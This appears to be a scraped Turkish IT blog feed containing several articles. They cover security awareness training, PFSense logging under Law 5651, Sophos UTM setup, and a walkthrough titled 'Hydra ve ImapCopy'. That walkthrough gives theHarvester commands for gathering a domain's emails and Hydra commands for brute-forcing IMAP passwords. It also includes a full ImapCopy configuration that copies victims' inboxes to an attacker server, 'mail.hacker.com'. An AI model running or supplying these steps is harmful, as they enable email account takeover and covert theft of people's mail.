x      Kurumun bilgi güvenliği politika ve standartlarında belirtilen son kullanıcı sorumluluklarına uy Her  hedef  kitle  için  üst  seviye  mesajlar  belirlendiğinde  detay  mesajlar  ve  eğitim  ihtiyaçları belirlenebilir. Bunu yapabilmek için güvenlik programının yapı taşları ve son zamanlarda gerçekleşen güvenlik ihlalleri gözden geçirilebilir. Gözden geçirilebilecek bazı yapı taşları aşağıdaki gibidir:

x     Güvenlik politika, standart ve prosedürleri

x     İlgili kanuni düzenlemeler

x      Son olaylar (yetkisiz erişim, virüs bulaşması gibi)

x     Sistem, uygulama ve bilgi ağı denetim sonuçları x Eğitim talepleri

x     Yeni teknolojinin kullanılmaya başlanması

x      Birinci adımda tespit edilen bulgular (Mevcut Eğitim İhtiyaçlarının Belirlenmesi) Ele alınabilecek bazı özel güvenlik konuları aşağıdaki gibi olabilir:

x     şifreler

x     Fiziksel güvenlik - kurum içi ve dışında

x     Sosyal mühendislik

x      Virüsler

x     e-Posta ve İnternet kullanımı

x     Onaylanmamış yazılım ve donanım kullanımı

x     Erişim kontrolü (en az yetki, rollerin ayırımı ve yedekleme ilkeleri)

x     İş sürekliliği ve felaket kurtarma

 

Bu adım periyodik olarak uygulanmalı, ancak ilk olarak bilinçlendirme programının temelini oluşturacak biçimde gerçekleştirilmelidir. Yukarıdaki maddeler her zaman yeni ihtiyaçların ortaya çıkıp çıkmadığının belirlenebilmesi için değerlendirilmelidir. Güvenlik programları yeni koşullara uyum      sağlayabilecek esneklikte olmalı, gerektiğinde içerik ve mesajların öncelikleri yenilenmelidir. Hedef kitleye uygun ve anlaşılabilir nitelikte mesajlar üretilmelidir. Gerçek hayat örneklerinin çalışmaya katılması programa olan ilgiyi artıracaktır.

 

Mevcut iletişim araçlarının belirlenmesi

 

Bilinçlendirme programındaki bir sonraki adım mevcut iletişim araçlarının belirlenmesidir. Her kurum kendine özgü iletişim olanaklarına sahiptir. Bu kaynakların tespiti yapılmalı, kaynakların kullanımına yönelik prosedürler anlaşılmalıdır. Örneğin bazı kurumlar kurum genelinde yapılacak yayınlar için üst yönetim onayını şart koşmaktadır. Bazı yaygın iletişim araçları aşağıdaki gibidir:

 

x     Herkese gönderilen e-posta

x     Özel kişilere gönderilen e-posta

x     Herkese gönderilen sesli posta

x     şirket genelgesi

x     Bölüm genelgesi

x      Intranet

x     Yazılı yayın - posterler, dönemsel şirket yayını, broşürler

x     Yüz yüze - toplantılar, sunumlar, eğitim ve güvenlik seminerleri

x     Kütüphane - videolar, kitaplar ve etkileşimli sunumlar

x      Hatırlatıcı malzemeler - sisteme giriş  mesajı, pazarlama araçları (kalem, silgi, mouse pad, anahtarlık, not kağıtları, vb.)

 

İletişim aracının seçiminde farklı kitlelerin farklı biçimlerde öğrenmeye açık oldukları düşünülmelidir. İletişimin etkili olması için birden fazla kanal kullanılabilir.

 

Uygulama için strateji geliştir

 

Başarılı bir bilinçlendirme çalışmasının uygulanabilmesi için gerekli son adım, mesajların tutarlı ve etkili iletimi için bir çerçeve geliştirilmesidir. Bu çerçeve geliştirilmeden iletilen mesajlar kullanıcılar tarafından düzensiz ve gelişi güzel bir çalışmanın eseri olarak algılanacaktır. Uygun stratejinin geliştirilebilmesi için, hedef kitleler, kilit mesajlar ve iletişim imkânları göz önüne alınmalı, programın tekrarlanabilir bir süreç haline getirilmesi sağlanmalıdır.

 

Bu adımın bir parçası olarak, açık bir pazarlama stratejisi belirlenmelidir. Pazarlama araçları

 

Şunları içerebilir: Logo, slogan, ofis araçları.

 

Bilinçlendirme stratejisi

 

Bilinçlendirmenin amacı temel olarak kullanıcıların bilgi ve bilgi kaynaklarının korunma ihtiyacını anlamasıdır. Aşağıdakiler, bilinçlendirme stratejisinin parçası olarak tekrarlanabilir taktiklerdir:

 

x     İşe alım sırasında yapılacak bilgilendirme

x     Aylık şirket bülteni

x     şirket yemek ve eğitimleri

x     Yıllık güvenlik seminerleri

x     Bilgi güvenliği konusundaki başarılar için teşvik ödülleri

x     Oyunlar, yap-bozlar ve yarışmalar

 

Eğitim stratejisi

 

Eğitim ve öğretimin amacı, kullanıcıların bilgi güvenliği, bilgi ve anlayış seviyelerinin artırılmasıdır. Aşağıdakiler, eğitim ve öğretim stratejisinin parçası olarak tekrarlanabilir taktiklerdir:

x     Temel son kullanıcı eğitimi

x     Teknik eğitim

x     Gelişmiş bilgi güvenliği eğitimi - Bu eğitim bilgi güvenliği uzmanları ve denetçileri içindir

x     Dönemsel eğitim paketi - Bu araç her dönem özel bir bilgi güvenliği konusuna odaklanmalıdır.

Bu eğitimler bilinçlendirme paketinden daha derin bilgi vermeyi hedeflemelidir.

 

Ölçebilme kabiliyeti

 

Ölçüm bilinçlendirme programının son adımıdır. Programın ilk uygulamasında belli bir kullanıcı bilinç seviye taban değerinin oluşturulması önemlidir. Çünkü bu seviyede ileride meydana gelebilecek gelişme veya gerilemeler ölçülebilir. Mevcut durum değerlendirmeleri yeni bir program ve strateji uygulanmadan önce de yapılmalıdır. Eğitim ve bilinç seviyesinin ölçümü kolay olmadığından, yaratıcı olunmasını gerektirir. Somut bazı ölçütlere ulaşılabilir, ancak çoğunlukla kalitatif ölçütlere dayanılması gerekmektedir.

 

Sonuç

 

Bilgi güvenliğinin önemi gün geçtikçe artmakta ve bilgi güvenliği daha karmaşık bir hal almaktadır. Yeni açık ve virüsler her gün ortaya çıkmaktadır. Teknoloji seviyesi ve saldırılardaki artışlarla, kullanıcıların bilinç ve eğitim seviyelerindeki yetersizlik açığa çıkmaktadır. Pek çok kullanıcı bilgi ve bilgi kaynaklarının korunmasının önemi konusunda ya çok az anlayışa sahiptirler ya da hiç bir  anlayışa sahip değildirler. Kurumlar açısından,  uygulanacak bir  bilgi güvenliği bilinçlendirme çalışmasının önemini anlamaları ve eğitim eksikliğinin giderilmesi kritik öneme sahiptir. İyi tasarlanmış ve yürütülmüş bir bilinçlendirme çalışması, güvenlik zincirinin en kırılgan halkasının güçlendirilmesinde büyük etki yaratacaktır.

 

Bilgi Güvenliği Ve Log Yönetimi İle İlgili Yazılarımıza Devam Edeceğiz.

 

Hydra ve ImapCopy

$
0
0

Saniyeler İçerisinde emailleriniz nasıl çalınır?

 

Bu yazımda sizlerle hackerların nasıl email hesap şifrelerini kırdıklarından ve içerisindeki mailleri siz fark etmeden nasıl saniyeler içinde istedikleri bir adrese aktarabildiklerinden bahsedeceğim. Konunun anlaşılabilir olması açısından öncelikle yüzeysel bilgi verip tools isimlerinden bahsedeceğim, sonrasında örnek bir senaryoyu canlandıracağım.

 

 

Email adreslerinin şifresinin çalınması ve emaillerinin yedeklenmesi işlemi 2 adımdan oluşmakta,

 

1-Email adresi şifresinin kırılması

2-Emaillerin kopyalanması.

 

1- Email şifresini kırmak

 

Bu işlem için genellikle brute force ataklar kullanılır, basit şifre kullanan email adresi dakikalar içerisinde ele geçirilebilir ve bunlar olurken email adres sahibi kesinlikle bunlardan haberdar olmaz.

 

Ancak dikkatli bir sistem mühendisi bu durumu fark edebilir ve önlem almayı deneyebilir.

 

Brute force için kullanılan bazı toolslar : Hydra, Medusa, Ncrack.

 

Ben bu makale de brute force tools olarak hyrda kullanacağım.

 

2-Emaillerin kopyalanması

 

Bu işlem için genellikle imap sync işlemi yapan toolslar kullanılır, internet bağlantısı, kullanılan mail sunucuların internet bağlantısı ve servis yoğunluğuna bağlı olarak mailler saniyeler içerisinde farklı bir email adresinin inbox folderına kopyalanabilir. Bu işlem esnasında son kullanıcı ve sistem yöneticilerinin olayı fark edebilmeleri neredeyse imkânsızdır.

 

Bu işlem için ben ubuntu debian gibi işletim sistemlerindeki imapcopy tools kullanıyorum, farklı seçenekler de mevcut internette imap copy, imap sync şeklinde aramalar ile bu toollara erişebilirsiniz.

 

3- Uygulamalı Örnek

 

a) Toolsların hazırlanması

 

Kullanacak olduğumuz iki tools var,

 

* Hydra (Brute Force için)

* ImapCopy (Emailleri farklı bir adresin inbox folderına taşımak için)

 

Backtrack kullanıcıları için hydra default olarak kurulu geliyor, ubuntu, debian v.b. Işletim sistemlerinde

 

                apt-get install hydra

 

Şeklinde uygulamayı kurabilirsiniz.

 

Kurulum tamamlandıktan sonra komut satırında hydra yazarak hydra programı ile ilgili ek parametrelere erişebilirsiniz, hydra pop3 imap gibi mail servisleri dışında rdp, ssh v.b. Gibi servisler için de brute force yapabilmektedir.

 

image001

 

a) Hydra

Tek bir email adresini hedef alan saldırı;

 

                hydra -l user@xxx.com -P Passwordlist.txt mail.xxx.com  imap

 

Kurumlara gerçekleştirilern saldırlarda Theharvester gibi toolslar ile alan adına ait mailler search edilir,

 

                ./theHarvester.py -d xxx.com -l 500 -b Google

 

Theharvester ile ilgili detaylı bilgiye için http://www.securistan.com/theharvester-kullanimi/ adresini ziyaret edebilirsiniz.

 

Theharvester ile elde etmiş olduğunuz email adreslerini email.txt adı ile bir txt e yazın ve aşağıdaki hydra komutunu kullanın,

 

                hydra -L email.txt -P Passwordlist.txt mail.xxx.com  imap

 

Passwordlist.txt içerisinde password listiniz olmalıdır.

 

Bu adımda user1@xxx.com ve user2@xxx.com email adresi şifresi elde ettiğimizi düşünerek ikinci bölüme geçiyorum.

 

b) ImapCopy

 

Imapcopy uygulamasını ubuntu debian gibi linux sürümlerinde,

 

                apt-get install imapcopy

 

komutu ile kurabilirsiniz.

 

Kurulumun tamamlandıktan sonra

 

                cd /usr/share/doc/imapcopy/examples/

 

komutu ile /usr/share/doc/imapcopy/examples/ dizinine gidiyoruz, Bu dizinde ImapCopy.cfg adın da bir text doküman mevcut, bunu editlememiz gerekecek, editlenecek alanlar,

 

SourceServer    : Saldırılan alan adı mail sunucunun ip adresi

 

DestServer         : Emaillerin kopyalancağı sunucu

 

Copy                     : User ve şifre bilgileri

 

Bu bölümler deki değişikliği yapyıktan sonra komut satırında,

 

                İmapcopy

 

komutunu çalıştırıyoruz ve mailleri kendi email adresimize almaya başlıyoruz.

 

SourceServer    : mail.xxx.com

 

DestServer         : mail.hacker.com

 

Copy     : "user1@xxx.com"        "123456"                             “hacker@hacker.com"                 "!'^+.RQ5%+”

#                Email adres                     Email Password                Hacker email                                     Hacker Password

 

 

NOT : Yukaırdaki email adres, email password, hacker email,  hacker password alanları açıklamadır.

 

 

Bu işlemin ardından hacker@hacker.com adresine baktığınızda user1@xxx.com ve user2@xxx.com a ait mailleri görebilirsiniz.

 

ImapCopy.cfg dosyası sadece inbox klasörünü taşıyacak şekilde configure edilmiştir, diğer folderlar için ImapCopy.cfg dosyasında değişiklik yapmanız gerekir.

 

 

Örnek ImapCopy.cfg dosya içeriği aşağıdaki gibidir.

 

 

##############

# Sourceserver

##############

SourceServer mail.xxx.com

SourcePort 143

 

###################

# Destinationserver

###################

DestServer mail.hacker.com

DestPort 143

 

 

# DebugSrc and DebugDest will show all traffic between IMAPCopy and Server

#

#DebugSrc

#DebugDst

 

 

#skipfolder INBOX.Trash

#skipfolder INBOX.Sent

#skipfolder "INBOX.Sent Objects"

 

 

copyfolder INBOX

#copyfolder "INBOX.My personal files"

#copyfolder INBOX.Net-Connection.dy

#copyfolder INBOX.test

 

 

#DstRootFolder "Your old Mails"

 

 

#AllowFlags "\Seen\Answered\Flagged\Deleted\Draft Junk NonJunk $MDNSent $Forwared"

DenyFlags "\Recent"

 

 

converttimezone "UTC" "+0000"

converttimezone "UT"  "+0000"

 

 

#############################

# List of users and passwords

#############################

#             SourceUser                       SourcePassword             DestinationUser                              DestinationPassword

Copy    "user1@xxx.com"         "123456"                "hacker@hacker.com"                 "!'^+.RQ5%+"

Copy    "user2@xxx.com"         "istanbul"              "hacker@hacker.com"                 "!'^+.RQ5%+”

 

Makalemin sonuna geldim. Umarım faydalı bir makale olmuştur. Bir sonraki makalemde görüşmek üzere.

 

 

PFSense 5651 Yasasına Uygun Loglama Modülü Kurulumu ve İmzalanması

$
0
0



Merhaba Arkadaşlar bu makalemizde PFSense üzerinde 5651 yasasına göre loglama işlemlerinin nasıl yapılacağını ve modülünün kurulumunu yapacağım.



5651 Yasası Nedir?



ÇözümPark üzerinde bu konu hakkında birçok makale mevcuttur fakat kısaca açıklamamız gerekirse İç ağımızda dağıtılan IP adres bilgilerini, kullanıma başlama, bitiş tarihi, saati ve bu ip adreslerini kullanan bilgisayarların MAC Adreslerini gösteren kayıtları Elektronik ortam’da saklanması ve oluşan logları zaman damgası ile birlikte günlük olarak imzalatmamız 1 yıl boyunca saklamamız gerekmektedir.



PFSense Nedir ?



PFSense ( Packet Filter ) Freebsd tabanlı ücretsiz olarak dağıtılan Open Source güvenlik duvarı yazılımıdır.



TIB5651 Modulü Nedir ve Nasıl Çalışır ?



Yasanın bizden istemiş olduğu logları toplar ve 5651 yasasına uygun hale getirip belirlediğiniz zaman dilimleri arasında Sunucularınıza veya PFSense üzerinde herhangi bir dizine aktarımını tamamlayabilirsiniz.İsterseniz opsiyonel olarak alınan logların bir kopyasını e-posta adresinize göndertebilirsiniz.



Klasik tanımlarımızı yaptıktan sonra daha önce PFSense kullandığınızı ve bu aşamaya geldiğinize göre modülümüz hakkında bilgi vermek istiyorum.


- Otomatik ve Elle girilen ip adreslerinin loglarını gönderir.
- DHCP,Squid loglarını toplar ve ilgili dizine gönderir.
- Samba Client ile Windows işletim sistemlerine log aktarımını yapabilirsiniz.
- 2 Adet log dosyası oluşturur. 1. Log dosyamız yasamıza uygun olan içindir. Alternatif olarak sistem yöneticileri içinde ayrıntılı bir log daha oluşturur.
- SMTP desteği ile logları eposta olarak göndertebilirsiniz.
- Birden fazla interface destekler.
-Cron ile istediğiniz zaman diliminde log aktarımlarınızı yapabilirsiniz.

 

PFSense Paket Yönetimin’den yüklememiz  gereken paketler ;



-Squid
-Squid Guard
-Cron



Loglarımızın Windows bilgisayarlarımıza aktarılması ve E-Posta olarak gönderilmesi için Freebsd tarafında yüklememiz gereken paketler ;



-Talloc (2.0.7)
-Samba Client (3.6.7) 
-Net SMTP 

Yukarıdaki modüllerin sürümleri parantez içinde belirtilmiştir.



Logları aktaracağımız Windows bilgisayarımızda Tib Log İmzalayıcı yazılımın yüklü olması gerekmektedir.



Kuruluma geçmeden önce yapımız ve modül sonrası oluşacak network şemamız hakkında aşağıdaki gibi bir grafik hazırladım.

 





image001

 


Modülümüz ve yasamız hakkında yeterli bilgi aldığımıza göre artık kuruluma geçebiliriz. Önceliğimiz Windows bilgisayarımızda yapmamız gerekenleri yapalım.


Ben PFSense’den gelecek logları bilgisayarımın D bölümünde depolayacağım ve PFSense’nin logları aktarması için ilgili log dizinlere everyone okuma,yazma izni vereceğim. ( Dilerseniz sadece bir kullanıcıya okuma yazma izni verip o şekilde paylaşıma açabilirsiniz. )



2 Adet klasör oluşturuyoruz isimleri aşağıdaki gibi olacaktır. 



Logs_Admin ( Sistem  Yöneticileri için gelişmiş logların gönderileceği klasör )
Logs_Tib ( Tib’in bizden istemiş olduğu logların gönderileceği klasör )

Şekil 2 – Paylaşım İzinlerinin verilmesi

 


image002

 



Şekil 2’de gördüğünüz gibi Logs_Admin,Logs_Tib klasörlerine “ Everyone “ okuma yazma izni verdim.

 



Son olarak Windows bilgisayarımızda yapmamız gereken işlem Logs_Tibs klasörüne gönderilecek olan logların Tib Log İmzalayıcı yazılım ile imzalanması.
Tib Log İmzalayacı yazılımı indiriniz.


http://tib.gov.tr/tr/dokumanlar/IPLogImzalayiciSetup3.0.exe

 

Şekil – 3 Log İmzalayıcı yazılımının ayarları;

 

 


image003

 



Şekil 3’te gördüğünüz gibi Logs_Tibs klasörüne log gönderildiğinde imzalanmasını sağlıyoruz ve “ Ayarları Kaydet” diyerek ayarlarımızı kaydediyoruz.



Windows Bilgisayarımızda yapmamız gereken bütün işlemler bu kadardır. Modülümüzün çalışması için PFSense web ara yüzünden yüklememiz gereken paketlerin kurulumlarını tamamlayalım.



PFSense Web Arayüzüne erişin ve System -> Packages -> Available Packages bölümüne geçiş yapınız.

 

 

Şekil - 4
image004

 



Squid,Squid Guard,Cron paketlerimizin kurulumunu bu bölümden Şekil 4’teki gibi gerçekleştirelim.

 



Şekil - 5
image005

 



Kurulum sonrası Yüklü olan paketlerimizi “Installed Packages” bölümünden kontrol edelim.Sorunsuz bir şekilde paketlerimizin kurulduğunu görüyoruz.

Şekil - 6

 


image006

 



Eğer daha önce Proxy Server’i yapılandırmamışsanız.Menü’den Services -> Proxy Server bölümüne geçiş yapalım ve ayarlarımızı yukarıdaki resim gibi yapılandırınız.


Şekil -7
image007

 



PFSense hazır paketler kısmında bulunmayan Samba Client, Talloc ve Net SMTP paketlerini yüklemek için SSH ile PFSense sunucumuza bağlanmamız gerekiyor. Onun için System -> Advanced bölümüne geçiş yapalım ve resimdeki gibi “ Enable Secure Shell “ seçeneğini işaretleyip “ Save “ butonu ile ayarlarımızı kaydedelim.

 

Windows Bilgisayarımıza geri dönüp Putty,Winscp  programlarını kuralım.



Putty ile sunucumuza bağlanıp aşağıdaki paketlerimizin kurulumunu yapalım.



Not : PFSense SSH kullanıcı adı root şifresi pfsense web arayüzüne girdiğiniz şifredir.



-Talloc (2.0.7)
-Samba Client (3.6.7) 
-Net SMTP

Kurulum yapmamız için PFSense bağlandıktan sonra “8” rakamı ile Shell bölümüne giriş yapalım.




Shell bölümünde  aşağıdaki komutu koşturarak yüklü olan paketlere göz atalım. Eğer versiyon uymuyorsa ilgili paketleri kaldıralım ve aşağıdaki yönergeleri takip ederek tekrar kurulumlarını gerçekleştirelim.



# pkg_info

Şekil - 8
image008

 



Yukarıda gördüğünüz gibi ben daha önce ilgili paketlerin kurulumunu yapmıştım yüklü olarak ve versiyonları doğru bir şekilde gözüküyor.



Eğer sizde versiyonlar eskiyse aşağıdaki komutu koşturarak ilgili paketi sistemden kaldırabilirsiniz.


# pkg_delete –f paketismi

İlgili paketlerin kurulumunu yapmak için aşağıdaki komutları Shell üzerinde koşturalım.

 


image009

 



SambaClient Kurulumu ;
# pkg_add -r 
http://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-8-stable/All/talloc-2.0.7.tbz  
Talloc Kurulumu ;
# pkg_add -r 
http://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-8-stable/All/samba36-smbclient-3.6.7.tbz
Net SMTP Kurulumu ;
# pkg_add –r 
ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/old-releases/i386/8.1-RELEASE/packages/Latest/p5-Net-SMTP-TLS.tbz

Şekil – 10

 


image010

 


Yüklemeler bittikten sonra “ pkg_info “ komutunu koşturarak yüklü olan paketlerimizin kontrolünü yapalım Şekil 10’da gördüğünüz gibiyse SSH üzerinden yüklememiz gereken paketlerin hepsini başarılı bir şekilde yüklemişizdir.



Modülümüzün sağlıklı bir şekilde çalışması için ilgili paketlerin kurulumunu tamamladıktan sonra artık Modülümüzü PFSense sunucumuzda ilgili dizinlere gönderelim.



Modülü indirmek içinhttp://www.cozumpark.com/download/pfsense5651cozumpark.rar
 dosyasını Windows bilgisayarınıza indiriniz.

Şekil – 11

 


image011

 


WinSCP ile PFSense sunucusuna bağlanalım ve bir üst dizine çıkalım.


“pfsense5651cozumpark” Klasörünün içindeki klasörleri ( sbin,var)  sunucumuza yükleyelim. ( Sürükleyerek yükleme işlemini gerçekleştirebilirsiniz )

Şekil – 12

 



image012

 


sbin dizinine gönderdiğimiz TIB5651ANLRUN.sh ve TIB5651ARPrun.sh dosyalarımıza sağ tıklayıp Properties kısmından “0755” chmod yetkisi verelim.



Not : Var dizininde herhangi bir izin vermenize gerek yok.

 

Şekil – 13
image013

 



SBin dizine göndermiş olduğumuz TIB5651ANLrun.sh dosyamıza sağ tıklayıp “ Edit “ düzenleyelim.



Açılan pencere’de ip adresi, paylaşım adı, kullanıcı adı ve şifre bölümlerinizi kendinize göre düzenleyiniz.



Düzenleme işlemini bitirdikten sonra Ctrl + S tuşlarıyla kaydetip sbin dizininden bir üst dizine geçiniz.

 

Şekil – 14 
image014

 



Var -> TIB5651Tr ->  TibParameters -> dizinine girin ve “ pfsenseMAIL.cfg ” dosyasına sağ tıklayıp “ Edit “ düzenleyelim.



Şekil 14’de gördüğünüz gibi mail ayarlarınızı kendinize göre düzenleyiniz Ctrl + S ile kaydedip çıkınız.



SBin içerisine atmış olduğumuz “TIB5651ANLrun.sh “ ve “TIB5651ARPrun “ dosyalarını günün belirli saatlerinde çalıştırmamız gerekiyor. PFSense üzerinde bulunan logları düzenleyip TIB ve Sistem Yöneticileri için gelişmiş log dosyası haline getirip Windows bilgisayarımıza aktarması için bu dosyaların çalışmasını sağlamak için’de “ Cron “ paketini makalemizin başlarında yüklemiştik.


Cron ayarlarımızı yapılandırmak için PFSense arayüzünden -> Services - > Cron bölümüne giriş yapıyoruz.

 



Şekil - 15
image015

 



Bu bölümde (+) butonuna tıklayarak yeni bir görev oluşturuyoruz.
Şekil – 16

 



image016

 



/sbin/TIB5651ARPrun.sh dosyamızın 5 dakika’da bir çalışması için cron ayarlarımızı yapılandırıyoruz.Zaman yapısını değiştirmeyiniz. Bu dosya sistem’de çalışıp gerekli bilgileri alıp analiz ettikten sonra TibDailyControl klasörüne yazacaktır.

 

 

Şekil – 17
image017

 



TIB5651ANLrun.sh dosyası ilgili logların Windows bilgisayarınıza aktarılmasını sağlar. Dosya isimlerini olduğu gibi yazınız Freebsd küçük büyük harf duyarlıdır.


TIB5651ANLrun.sh dosyasını ben 23:45’de çalıştırıyorum siz yapınıza göre değişiklik yapabilirsiniz. Zamanlamayı 00:00’dan önce yapmalısınız çünkü PFSense 00:00’da ilgili logları temizler.



PFSense’yi yeniden başlatınız.


Modulün sağlıklı çalışıp çalışmadığını test etmek adına manual olarak TIB5651ARPrun.sh ve TIB5651ANLrun.sh dosyalarımızı çalıştıralım.



Putty açınız ve  “8” rakamı ile shell bölümüne giriş yapalım.


sbin klasörüne giriş yapalım.


# cd /sbin

öncelikle TIB5651ARPrun.sh dosyasını çalıştırıp logları analiz ettirelim.

# sh TIB5651ARPrun.sh

İlgili logları analiz ettikten sonra Windows bilgisayarımıza kopyalanmasını sağlayalım.

#sh TIB5651ANLrun.sh
Şekil – 18

 


image018

 


Gördüğünüz gibi logları başarılı bir şekilde Windows bilgisayarıma aktardı. Logs_Tibs klasörüne gönderilen dosyaları Tib Log imzalayıcı yazılımı imzalayacağı için göremezseniz şaşırmayın. Tıb Log İmzalayacı yazılım imzaladığı logları otomatik olarak kendi içeresindeki signed_files klasörüne kopyalar.


Loglarımızın e-mail olarak gelmesi için ayarlarını yapmıştık. Onların kontrolünü yapalım.

 


image019

 


E-postalarımızı kontrol ettiğimizde ilgili logların başarılı bir şekilde geldiğini görmekteyiz.


Modülü  bizlerle paylaştığı ve istediğimiz özellikleri eklediği için Bülent ÖZKAN abime sonsuz teşekkür ederim.



Sorularınızı forum üzerinden sorabilirsiniz.



Bir başka makalede görüşmek üzere, Keyifli Çalışmalar.

Sophos UTM Astaro Firewall V9.0 Özellikleri ve Kurulumu–Bölüm1

$
0
0

 

 

Merhabalar bu makalemde sizlere UTM Firewall’ lardan olan Sophos Astaro UTM özelliklerini ve kurulumunu anlatacağım.

 

Bildiği gibi şirketlerde bulunan en büyük sorun yapının ve mimarinin nekadar güvenli olduğudur.

 

UTM, Unified Threat Management / Birleştirilmiş Tehdit Yönetimi bir kurumun temel bir bakışla iç network veya dış çıkışları için kontrol edilmesi ve emin olunması gereken başlıca husus web filtrelemenin ve yoğun mail trafiği içinde anti spam blocker kurulumlarının ve denetimlerinin yapılması gerekir. Tabikide bunları yapmak yetmek. Bu konularda en ince ayrıntıya kadar girilmesi gerekmektedir.

 

Sizlere anlatacağım bu ürün yazılımsal ve donanımsal olarak satılıyor. Sophos’ un bu ürünü üzerinde bir çok tool’ luy la beraber gelmektedir. Gereken konfigürasyonları doğru ve ayrıntılı yapmanız sayesinde şirket içinde ve network’ ünde yüksek güvenlik sağlayacaksınızdır.

 

Sizlere bundan sonraki makalelerimde bu ürünün bütün özelliklerini ve toollarını nasıl kullanıp konfigüre edeceğinizi anlatacağım.

 

Bu ürün üzerinde bulunan özelliklerden bahsedeyim.

 

Kurulum tamamlandıkdan sonra Network Protection, Web Protection, Email Protection, Endpoint Protection, Wireless Protection, WebServer Protection, Site to Site VPN, Remote Access ve yüksek detaylı loglama ve monitoring özellikleri kullanabileceksiniz ve bu özeliklerin içerisinde bir çok ayrıntı barındırıyor.

 

Bu makalemde yazılımsal olarak kurulumunu gerçekleştireceğim. Tabiki her UTM cihaında olması gerektiği gibi sistem özellikleride önemlidir. Sistem gereksinimleri yüksek olmamakla birlikde üzerindeki özellikleri performanslı olarak kullanabilmek içinde sistem özelliklerininde iyi olmasında fayda var.

 

Artık kuruluma geçelim…

 

 

image001

 

 

Firewall kurulumu yapacağımız makinamızı kurulum CD’ mizden başlatıyoruz ve kurulum için bu pencerede ENTER tuşuna basarak devam ediyoruz.

 

 

image002

 

 

Uyarıyor kurulumla beraber kurulumun yapılacak olan hard disk’ in üzerindeki verilerin silineceğini ve başka bir yazılımla desteklenmeyeceğini bildiriyor. START diyerek devam ediyoruz.

 

 

image003

 

 

Donanımlarımız bulunuyor…

 

 

image004

 

 

Kurulum yaptığımız makinada bulunan donanımları listeledi OK diyerek devam ediyoruz.

 

 

image005

 

 

Klavye düzenimizi seçiyoruz ve OK diyerek devam ediyoruz.

 

 

image006

 

 

Select Timezone penceresinden zaman dilimizi ve konumumuzu belirliyoruz ve next diyerek devam ediyoruz…

 

 

image007

 

 

Date and Time penceresinde saat ve tarihi belirliyoruz ve Next diyerek devam ediyoruz…

 

 

image008

 

 

Select Admin Interface penceresinde gördüğünüz gibi makinamız üzerinde bulunan NIC’ leri görüyoruz. Local network’ den yönetim konsolumuza bağlanacağımız interface’ imizi seçiyoruz ve Next diyerek devam ediyoruz.

 

 

image009

 

 

Network Configuration penceresinde yönetimsel network interface’ imizi konfigüre ediyoruz. Local Network bacağımıza IP sini ve Subnetmask’ ımızı tanımlıyoruz. Gateway opsiyonel dir farklı bir firewallumuz varsa ve entegre çalıştıracaksak onun adresini Gateway olarak verebiliriz Örneğin (Juniper Firewall Modem) üzerinden de geçirebilirsiniz. Benim tek firewall’ um olduğundan dolayı Gateway vermiyorum NEXT diyerek devam ediyorum.

 

 

image010

 

 

64 Bit Kernal Support penceresinde işlemcinin 64-Bit desteği varsa 64-Bit kurulum yapmanın performansda daha artış olacağını belirtiyor. Benim işlemcimin 64-Bit desteği olduğundan YES diyerek devam ediyorum fakat sizin işlemcinizin 64-Bit desteği bulunmuyorsa NO diyerek 32-Bit kurulum yapmasına devam edebiliriz.

 

 

image011

 

 

Enterprise Toolkit penceresinde lisanslama gerekliliğinde Enterprise Toolkitlerinin kurulumuna dair bilgilendirme veriyor. Bu sürümdeki tüm özellikleri ve toolkitlerinin kurulumunu isteyip istemediğimizi soruyor. Bütün özelliklerin kurulumunu istiyorum ve YES diyerek devam ediyorum.

 

 

image012

 

 

Installation : Partitioning penceresinde a rtık kuruluma başlıyacak bunun için uyarıyor. Bu işleme devam edersek hard disk üzerinde bulunan tüm verilerin silineceğini ve devam edip etmeyeceğimizi soruyor. YESdiyerek devam ediyoruz.

 

 

image013

 

 

Formatting penceresinde 6 adımdan oluşuyor. Harddiskimizi formatlıyor ve kurulumu gerçekleştirmeye başladı artık…

 

 

image014

 

 

Installation Finished penceresinde kurulumumuzun tamamlandığını görüyoruz. Makinamızı reboot ettikden sonra yönetim konsolumuza Browser’ dan erişim adresimizi görüyoruz. https://192.168.245.2:4444adresinden erişim sağlayacağız REBOOT diyerek makinamızı yeniden başlatıyoruz…

 

 

image015

 

 

Makinamızı yeniden başlattık ve üzerinde bulunan servislerin başlatıldığını ve yüklendiğini görüyoruz. Artık yönetim konsolumuza web browser üzerinden erişelim…

 

 

image016

 

 

Web browser üzerinden yönetim konsolumuza eriştik. Basit kurulumumuzu dolduruyoruz ve onaylıyoruz.

 

 

image017

 

 

Artık Yönetim Konsolumuzun arayüzünü görüyoruz. Bundan sonraki bütün konfigürasyonları bu Web konsoldan gerçekleştireceğiz.

 

Evet arkadaşlar Sophos Astaro Firewall kurulumumuzu gerçekleştirdik bundan sonraki makalemde sizlere konfigürasyonları ve ayarları nasıl yapacağımızı anlatacağım.

 

Umarım sizlere faydalı olacaktır…

Sophos Astaro UTM V9 Üzerine Network Interfacelerinin Eklenmesi ve Yapılandırılması–Bölüm2

$
0
0

 

Merhaba arkadaşlar bir önceki makalemde Sophos Astaro UTM ürünümüzün kurulumunu gerçekleştirmiştik. Bu makalemde sizlere network adaptörlerimizi nasıl tanımlayacağımızı anlatacağım. Bildiğimiz gibi network adaptörlerini tanıtarak yapılandırmak kendi yapımıza ve işleyişine göre değişiklik göstermektedir.

 

Kendi yapıma göre bütün local network’ ümün trafiğini Astaro üzerinden filtreleyip yöneteceğimden dolayı External bir network adaptörü ekleyip yapılandıracağım.

 

 

 

image001

 

 

 

Astaro Management Konsolumuzu açıyoruz. Sol taraf da bulunan yönetim menülerimizde Interfaces & Routing menümüze geliyoruz.

 

 

image002

 

 

Interfaces & Routing Menümüzde Interfaces linkimize geliyoruz. Burada New Interface butonuna geliyoruz. Burada bir çok özellik mevcut ve yapılandırıldıklarında çok iyi performanslar sağlayacaklar tabi ki bütün özellikleri sizlere ilerleyen zamanlarda anlatacağım.

 

 

image003

 

 

Gördüğünüz üzere Type kısmında bağlantı tiplerimiz bulunuyor. İşte yapımıza göre bağlantı tipimizi ayarlamamız gerekiyor. Network kartımızın üzerinde bulunan bağlantı tipimizi belirliyoruz. Benim yapımda modemim üzerinden gelen network bağlantısı üzerinden NAT yapacağımdan dolayı oluşturacağım network adaptör tipi’ mi Cable Modem(DHCP) olarak seçiyorum.

 

 

image004

 

 

